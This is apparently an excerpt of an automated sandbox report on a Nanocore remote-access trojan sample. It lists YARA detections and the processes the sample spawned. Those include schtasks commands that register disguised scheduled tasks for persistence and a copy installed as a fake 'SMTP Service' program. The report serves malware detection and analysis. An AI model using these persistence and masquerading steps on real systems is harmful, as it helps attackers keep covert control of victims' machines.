                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.455467498.00000000034FB000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.455467498.00000000034FB000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.454727273.00000000024A6000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.455829246.000000000374F000.00000004.00000001.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.455829246.000000000374F000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.455829246.000000000374F000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                          Antivirus matches:
                                                          • Detection: 100%, Joe Sandbox ML
                                                          Reputation:low

                                                          General

                                                          Start time:14:31:37
                                                          Start date:26/10/2021
                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\eWoGxZG' /XML 'C:\Users\user\AppData\Local\Temp\tmp566B.tmp'
                                                          Imagebase:0xef0000
                                                          File size:179712 bytes
                                                          MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Start time:14:31:38
                                                          Start date:26/10/2021
                                                          Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                          Imagebase:0xf50000
                                                          File size:32768 bytes
                                                          MD5 hash:72A9F09010A89860456C6474E2E6D25C
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000000.451843619.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000000.451843619.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: NanoCore, Description: unknown, Source: 00000007.00000000.451843619.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.704763684.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.704763684.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: NanoCore, Description: unknown, Source: 00000007.00000002.704763684.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000000.453026505.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000000.453026505.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: NanoCore, Description: unknown, Source: 00000007.00000000.453026505.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.704932496.0000000000560000.00000004.00020000.sdmp, Author: Florian Roth
                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000007.00000002.704932496.0000000000560000.00000004.00020000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.704932496.0000000000560000.00000004.00020000.sdmp, Author: Joe Security
                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000000.452221812.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000000.452221812.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: NanoCore, Description: unknown, Source: 00000007.00000000.452221812.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000000.452672182.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000000.452672182.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: NanoCore, Description: unknown, Source: 00000007.00000000.452672182.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.706102715.0000000003676000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: NanoCore, Description: unknown, Source: 00000007.00000002.706102715.0000000003676000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.704921985.0000000000550000.00000004.00020000.sdmp, Author: Florian Roth
                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000007.00000002.704921985.0000000000550000.00000004.00020000.sdmp, Author: Florian Roth
                                                          Reputation:moderate

                                                          General

                                                          Start time:14:31:42
                                                          Start date:26/10/2021
                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp249A.tmp'
                                                          Imagebase:0x730000
                                                          File size:179712 bytes
                                                          MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Start time:14:31:45
                                                          Start date:26/10/2021
                                                          Path:C:\Windows\System32\taskeng.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:taskeng.exe {AC07D2CB-425B-43FA-983F-3B14071F638D} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
                                                          Imagebase:0xffdd0000
                                                          File size:464384 bytes
                                                          MD5 hash:65EA57712340C09B1B0C427B4848AE05
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Start time:14:31:46
                                                          Start date:26/10/2021
                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp1E64.tmp'
                                                          Imagebase:0x9d0000
                                                          File size:179712 bytes
                                                          MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Start time:14:31:46
                                                          Start date:26/10/2021
                                                          Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe 0
                                                          Imagebase:0xf50000
                                                          File size:32768 bytes
                                                          MD5 hash:72A9F09010A89860456C6474E2E6D25C
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Reputation:moderate

                                                          General

                                                          Start time:14:31:50
                                                          Start date:26/10/2021
                                                          Path:C:\Program Files (x86)\SMTP Service\smtpsvc.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0
                                                          Imagebase:0xa40000
                                                          File size:32768 bytes
                                                          MD5 hash:72A9F09010A89860456C6474E2E6D25C
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Antivirus matches:
                                                          • Detection: 0%, Metadefender, Browse
                                                          • Detection: 0%, ReversingLabs

                                                          General

                                                          Start time:14:31:54
                                                          Start date:26/10/2021
                                                          Path:C:\Program Files (x86)\SMTP Service\smtpsvc.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:'C:\Program Files (x86)\SMTP Service\smtpsvc.exe'
                                                          Imagebase:0x1080000
                                                          File size:32768 bytes
                                                          MD5 hash:72A9F09010A89860456C6474E2E6D25C
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET

                                                          Disassembly

                                                          Code Analysis

                                                          Reset < >